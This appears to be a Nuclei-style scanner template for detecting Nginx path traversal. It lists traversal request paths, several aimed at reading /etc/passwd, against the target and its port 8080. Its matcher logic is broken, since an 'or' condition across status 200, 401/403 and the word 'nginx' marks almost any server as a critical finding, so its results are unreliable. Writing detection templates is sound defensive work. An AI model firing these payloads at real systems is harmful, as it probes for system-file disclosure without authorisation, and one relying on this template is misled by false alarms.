id: nginx-misconfig
info:
  name: Nginx Misconfiguration Detection
  author: pwn
  severity: critical
  description: Detects exposed Nginx instances vulnerable to path traversal, potentially leading to system file exposure.
  tags: nginx, misconfiguration, path-traversal

http:
  - method: GET
    path:
      - "{{BaseURL}}//////../../../../../../../etc/passwd"
      - "{{BaseURL}}/////////////////////////../../../../../../../../etc/passwd"
      - "{{BaseURL}}/.."
      - "{{BaseURL}}/../"
      - "{{BaseURL}}/../something"
      - "{{BaseURL}}/../../something"
      - "{{BaseURL}}/../../../../../../../../../../../../../../../../../../../../../../../../../../"
      - "{{BaseURL}}/../../../../../../../../../../../../../../../../../../../../../../../../../../something"
      - "{{BaseURL}}:8080//////../../../../../../../etc/passwd"
      - "{{BaseURL}}:8080/////////////////////////../../../../../../../../etc/passwd"
      - "{{BaseURL}}:8080/.."
      - "{{BaseURL}}:8080/../"
      - "{{BaseURL}}:8080/../something"
      - "{{BaseURL}}:8080/../../something"
      - "{{BaseURL}}:8080/../../../../../../../../../../../../../../../../../../../../../../../../../../"
      - "{{BaseURL}}:8080/../../../../../../../../../../../../../../../../../../../../../../../../../../something"
    matchers-condition: or
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "passwd"
          - "nginx"
        part: body
        condition: or
        case-insensitive: true
      - type: word
        words:
          - "Server: nginx"
        part: header
        condition: or
        case-insensitive: true
      - type: word
        words:
          - "nginx"
        part: body
        condition: or
        case-insensitive: true
      - type: status
        status:
          - 403
          - 401
    extractors:
      - type: regex
        name: matched_path
        part: request
        regex:
          - "https?://[^/]+(/.*)"
        group: 1
